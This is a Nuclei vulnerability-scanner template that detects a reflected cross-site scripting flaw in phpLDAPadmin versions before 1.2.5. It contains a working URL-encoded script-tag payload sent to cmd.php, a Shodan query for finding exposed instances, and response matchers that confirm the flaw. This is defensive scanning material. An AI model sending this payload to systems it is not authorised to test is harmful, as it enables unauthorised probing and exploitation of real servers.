nuclei-templates/http/vulnerabilities/other/phpldapadmin-xss.yaml

54 lines
1.4 KiB
YAML

id: phpldapadmin-xss
info:
name: PHP LDAP Admin < 1.2.5 - Cross-Site Scripting
author: GodfatherOrwa,herry
severity: medium
description: PHP LDAP Admin is vulnerable to XSS.
reference:
- https://twitter.com/GodfatherOrwa/status/1701392754251563477
classification:
cpe: cpe:2.3:a:phpldapadmin_project:phpldapadmin:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 9
vendor: phpldapadmin_project
product: phpldapadmin
shodan-query: html:"phpLDAPadmin"
tags: php,phpldapadmin,xss
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}{{path}}/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&meth=ajax&server_id=1"
- "{{BaseURL}}{{path}}/index.php?redirect=true&meth=ajax"
attack: pitchfork
payloads:
path:
- /
- /htdocs/index.php
- /phpldapadmin
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "No such entry"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100e27c144b3387000d31b66b220a2ab51cea738f7b9066353b5e5afbf37fbd28e1022046fa83095bb9d286c449a380d9ddc60bfdefc36834bbc36b92b44aadf795d76f:922c64590222798bb761d5b6d8e72950